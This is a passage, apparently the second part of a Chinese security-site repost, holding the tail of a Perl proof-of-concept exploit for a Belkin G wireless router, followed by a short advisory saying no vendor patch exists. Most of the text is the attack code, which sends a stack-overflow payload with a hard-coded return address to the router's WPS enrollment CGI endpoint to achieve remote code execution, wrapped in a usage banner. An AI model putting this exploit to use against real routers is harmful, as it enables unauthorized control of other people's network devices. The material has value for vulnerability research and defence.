4 G Wireless Router身份验证绕过和远程代码执行漏洞(2)

my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC  -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;

$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
$response = $browser->post( $url,[ 'pin' => "$payload"]);
if( !$response->content )
  {
    print "[-] Damn! Something went wrong. This might not work here :-/\n";
  }
else
{
    print "[-] Done! \\m/\n";
}

}

sub Welcome()
{
  print "\n\n+------------------------------------------+\n";
  print "|  Belkin G Wireless Router Remote Exploit |\n";
  print "|    (Authentication bypass & RCE PoC)    |\n";
  print "+------------------------------------------+\n";
  print "[+] By Aodrulez.\n";
  print "\n[+] Usage  : perl $0 router_ip";
  print "\n[!] Example : perl $0 X.X.X.X";

if (!$ARGV[0])
  {
    print "\n[-] (o_0) Seriously??\n";
    exit;
  }

$ip=$ARGV[0];
  print "\n[+] Target IP : $ip\n";

}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.

建议:
--------------------------------------------------------------------------------
厂商补丁:

Belkin
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

?rnId=306

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/aa4aa7eac056802bbf2cad016de8a347.html